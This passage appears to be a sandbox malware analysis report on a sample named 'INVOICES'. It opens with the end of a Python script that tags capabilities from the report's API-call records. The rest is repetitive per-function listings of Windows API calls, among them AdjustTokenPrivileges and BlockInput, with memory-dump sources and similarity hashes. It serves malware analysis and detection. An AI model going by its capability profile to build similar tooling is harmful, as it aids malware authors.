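    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))

def tag_record(rec):
    """Derive coarse capability tags from the ordered direct (non-subcall) API calls."""
    direct = [c for c in rec.calls if c.subcall is None]
    names = [c.name for c in direct]
    tags = {}
    if "InternetReadFile" in names:
        tags["wininet_read"] = True
    if "AdjustTokenPrivileges" in names:
        i = names.index("AdjustTokenPrivileges")
        # TRUE from AdjustTokenPrivileges does not mean the privilege was granted;
        # only a GetLastError check can catch ERROR_NOT_ALL_ASSIGNED (1300).
        tags["privilege_adjust_checks_last_error"] = i + 1 < len(names) and names[i + 1] == "GetLastError"
    if "AllocateAndInitializeSid" in names and "CheckTokenMembership" in names:
        call = next(c for c in direct if c.name == "AllocateAndInitializeSid")
        sid = sid_from_allocate_args(call.args)
        tags["group_check"] = WELL_KNOWN_SIDS.get(sid, sid)
    return tags

def summarize(text):
    """Map each record's Opcode ID (stable across re-analyses) to its capability tags."""
    return {r.opcode_id: tag_record(r) for r in parse_records(text)}

if __name__ == "__main__":
    for opcode_id, tags in summarize(SAMPLE_REPORT).items():
        print(opcode_id[:16], tags)
```

Keying the summary on Opcode ID rather than on the call-site addresses is deliberate: addresses shift between builds and between dumps, while the Opcode ID is what the report's own Similarity section uses to match the same function across samples, so the tags can be joined against other reports of the same family.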
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a2e24dae9cebc89338ae452a81df02f3d62b7175b7442b77193996696da6f14f
• Instruction ID: d8a2de121ca0bc83f3ccf975c0e51d824d29eeea035f3eb46d9aee60c2f49c81
• Opcode Fuzzy Hash: a2e24dae9cebc89338ae452a81df02f3d62b7175b7442b77193996696da6f14f
• Instruction Fuzzy Hash: D822907190021ADFEB24DF54C485BAEB7B0FF08310F148169E956AB392E778AD85CB91
APIs
  • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
  • Part of subcall function 007325DB: GetWindowLongW.USER32(?,000000EB), ref: 007325EC
• GetParent.USER32(?), ref: 0076B93A
• NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,007319B3,?,?,?,00000006,?), ref: 0076B9B4
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: LongWindow$DialogNtdllParentProc_
• String ID:
                                                                                                                                  • API String ID: 314495775-0
                                                                                                                                  • Opcode ID: 8cf7761dd350dfacec919a3e9689eb8f1b458d2b4fc641229235e749fa58a1be
                                                                                                                                  • Instruction ID: c98bbeefa86faebab2b3222cb5ff76e7ad3b8dcde615b9cc65e00c55bc0b78f7
                                                                                                                                  • Opcode Fuzzy Hash: 8cf7761dd350dfacec919a3e9689eb8f1b458d2b4fc641229235e749fa58a1be
                                                                                                                                  • Instruction Fuzzy Hash: 2E219934205514EFDB149F28CC88EA53BD6AF06360F984254FA165B2F3C7396D51D750
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0079C787
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079C7B7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                  • Opcode ID: 93ed3dbc6a5fbd5816e7029fe84449a6d1754503ca4bb3dde1a05a274491f27d
                                                                                                                                  • Instruction ID: 36606f2a9fd2cf326428014f68b7b721238f584a1e976351a68898133bbc1582
                                                                                                                                  • Opcode Fuzzy Hash: 93ed3dbc6a5fbd5816e7029fe84449a6d1754503ca4bb3dde1a05a274491f27d
                                                                                                                                  • Instruction Fuzzy Hash: CC118E326002049FDB10EF69D849A6AF7E8FF84320F00861EF9A997291DB74A800CB91
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0076BABA,?,?,?), ref: 007BC65B
                                                                                                                                    • Part of subcall function 007325DB: GetWindowLongW.USER32(?,000000EB), ref: 007325EC
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 007BC641
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1273190321-0
                                                                                                                                  • Opcode ID: 0b19c8d5993226c2c9374ddeaa37ec3aa5413914c547b8bfd16e6693bbebb286
                                                                                                                                  • Instruction ID: 7847c964242c026c56807e1e9012a61d01a2f357ba8f2b39f42688c264102f1d
                                                                                                                                  • Opcode Fuzzy Hash: 0b19c8d5993226c2c9374ddeaa37ec3aa5413914c547b8bfd16e6693bbebb286
                                                                                                                                  • Instruction Fuzzy Hash: 4D01D831200204EBDB225F14CC88FA63BB6FF85724F148139FA114B2E1C739A852DB94
                                                                                                                                  APIs
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 007BC9CB
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0076BB96,?,?,?,?,?), ref: 007BC9F4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3420055661-0
                                                                                                                                  • Opcode ID: e6ce97be8996b4ce937b1ddfe3cd62faa40e12748d457f11cf7d81252d3962b0
                                                                                                                                  • Instruction ID: 4761bb6cd324768deab4e17958ec9b01bf3a13d104e25065efef22711cf6d7ea
                                                                                                                                  • Opcode Fuzzy Hash: e6ce97be8996b4ce937b1ddfe3cd62faa40e12748d457f11cf7d81252d3962b0
                                                                                                                                  • Instruction Fuzzy Hash: E0F01772400218FFEB059F85DC09EAE7BB9EB48711F00826AF901A2161D3756A60EBA4
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007A957D,?,007BFB84,?), ref: 0079A121
                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007A957D,?,007BFB84,?), ref: 0079A133
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                  • Opcode ID: 2fefdb4f84db9c380b187e7d5b1d0281b6c30e279f5680e097b0a5434bdc5a94
                                                                                                                                  • Instruction ID: 064433f959b2425b0132ba1bcb659c81dd63f4d4ba08df97fe572e4691a2c688
                                                                                                                                  • Opcode Fuzzy Hash: 2fefdb4f84db9c380b187e7d5b1d0281b6c30e279f5680e097b0a5434bdc5a94
                                                                                                                                  • Instruction Fuzzy Hash: 95F05E7554522DFBDB20AAA4DC49FEA776CFF08761F008265F909D6281D6349940CBA1
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 007BCAEE
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0076BB15,?,?,?,?), ref: 007BCB1C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: 830246eae9a9eeac11563444c220b415ffac57eb0d8872d36b648bd84af51433
                                                                                                                                  • Instruction ID: 3457371f73fbcbc0d8545f1776f04495321c3281a40583d750045bea7208bd42
                                                                                                                                  • Opcode Fuzzy Hash: 830246eae9a9eeac11563444c220b415ffac57eb0d8872d36b648bd84af51433
                                                                                                                                  • Instruction Fuzzy Hash: 4FE04F70100258BBEB155F19DC1AFBA3B54EB04751F10C215F996D90E1C674A850D764
                                                                                                                                  APIs
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00788631), ref: 00788508
                                                                                                                                  • CloseHandle.KERNEL32(?,?,00788631), ref: 0078851A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 81990902-0
                                                                                                                                  • Opcode ID: b8c666fa956de0dcf857cf076539194c3da23dc146e8853536cd16ec3d14e6b1
                                                                                                                                  • Instruction ID: 0615d22683cb78b74e8274991adf756ca4e77a443666f196e8086ea2e1df2e2f
                                                                                                                                  • Opcode Fuzzy Hash: b8c666fa956de0dcf857cf076539194c3da23dc146e8853536cd16ec3d14e6b1
• Instruction Fuzzy Hash: A4E08C32004600EFE7212F24EC08EB77BE9EF04315718C92DF89680470DF66ACA0DB90
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,007C4178,00758ED7,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 0075A2DA
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0075A2E3
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: eda1d0809941c7a52235831e9a209927083fb1ce432bcf344ade53782394d206
• Instruction ID: c79a09ea4873e3d384f3035ce4eb85ea600843cbebf55fd9bea24fb691b523eb
• Opcode Fuzzy Hash: eda1d0809941c7a52235831e9a209927083fb1ce432bcf344ade53782394d206
• Instruction Fuzzy Hash: 24B09231054208ABCA002B91EC09F883FA8EB44EA2F40C120F60E86060CB6654508A99
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9d838e02ae2c1b421526942a75e9a8bdf703a6af4e896f9fd2e2627cc66560ff
• Instruction ID: 1a2dcebcef2fbd864f789d5b1f8c192bc22e2bde1c3244f443c12696174fb396
• Opcode Fuzzy Hash: 9d838e02ae2c1b421526942a75e9a8bdf703a6af4e896f9fd2e2627cc66560ff
• Instruction Fuzzy Hash: 4D320062D29F414DD7279A34C832326A349AFB73C5F15D73BEC1AB59A6EF2D88834104
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35315e05ed32673dabd4031bca82af3e9fd4d280a511298af042ecac552b3334
• Instruction ID: 94d34bb4292d6c945702fb0c7e9c8fffca9f4ab96f0ca731088d8cbb829dd1e9
• Opcode Fuzzy Hash: 35315e05ed32673dabd4031bca82af3e9fd4d280a511298af042ecac552b3334
• Instruction Fuzzy Hash: 54B1F020D2AF854DD32396398835336BB5CAFBB2CAF51D71BFC2674D22EB2985834145
APIs
• __time64.LIBCMT ref: 00798944
  • Part of subcall function 0075537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00799017,00000000,?,?,?,?,007991C8,00000000,?), ref: 00755383
  • Part of subcall function 0075537A: __aulldiv.LIBCMT ref: 007553A3
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID:
• API String ID: 2893107130-0
• Opcode ID: b920cf5245e84c68307085511f2d99bf3dbf77f91d19e723f6315c1d8c72bcac
• Instruction ID: fa64b99477ba5d569852e8b33cfcb60734b8f4721ca8c5c95a2074a9a821ffbf
• Opcode Fuzzy Hash: b920cf5245e84c68307085511f2d99bf3dbf77f91d19e723f6315c1d8c72bcac
• Instruction Fuzzy Hash: DA21B472635510CBC729CF25D441A62B3E1EBA5320B288E6CD5F5CB2D0CA78B905CB54
APIs
  • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
• NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 007BD8A2
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: DialogLongNtdllProc_Window
• String ID:
• API String ID: 2065330234-0
• Opcode ID: a51eb819dd6e0d6d658b7f5471e5f8f113017ed1645efe1b2ccc9107f2b6bf38
• Instruction ID: 814e85688f89517d27f1327bac1f130e65f2823ba3ccf54a76a6ae576a962ff6
• Opcode Fuzzy Hash: a51eb819dd6e0d6d658b7f5471e5f8f113017ed1645efe1b2ccc9107f2b6bf38
• Instruction Fuzzy Hash: 5A110A74200119FBFB385E2CCD09FF93B15DB41721F204334FA615A1D2DA6CAD019265
APIs
  • Part of subcall function 007325DB: GetWindowLongW.USER32(?,000000EB), ref: 007325EC
• NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0076BAD2,?,?,?,?,00000000,?), ref: 007BD49C
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: DialogLongNtdllProc_Window
• String ID:
• API String ID: 2065330234-0
• Opcode ID: 7a51ed3508eb2e4785a836f8d167c3a0e7afa4ac9f92ef29b71b6ad435ff38ca
• Instruction ID: 97dc371f186d3aa60b20e6567150c92b4d7cb701edd8a9d64fb9ab778e4ffd2c
• Opcode Fuzzy Hash: 7a51ed3508eb2e4785a836f8d167c3a0e7afa4ac9f92ef29b71b6ad435ff38ca
• Instruction Fuzzy Hash: D8012471600198BFDB249F29C849FFA3BA2EF41360F084164FE591B1A2D338BC20D7A0
APIs
  • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
• NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00731B04,?,?,?,?,?), ref: 007318E2
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: DialogLongNtdllProc_Window
• String ID:
• API String ID: 2065330234-0
• Opcode ID: 69a12da01efb28cf697a83e3ff8f4f4dafaf14113374166859335c24208c0af9
• Instruction ID: 6c516c1b2e62d399ff344915b1a2102a482e5ef13c65b6e84c257d9f0b4545eb
• Opcode Fuzzy Hash: 69a12da01efb28cf697a83e3ff8f4f4dafaf14113374166859335c24208c0af9
• Instruction Fuzzy Hash: 80F08934600615DFDB14DF18D855D753BE1FB54360F508129FA524B3A2C739EC50DB64
APIs
• BlockInput.USER32(00000001), ref: 007A403A
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: 3ce3586437f0d5323e2e2bdbf36f3f201466ad2be65543c59b180ed41be3abb6
• Instruction ID: a2ee6db1924c84231cef09147e3635f8004b78f7f98f4583d17377002428bf03
• Opcode Fuzzy Hash: 3ce3586437f0d5323e2e2bdbf36f3f201466ad2be65543c59b180ed41be3abb6
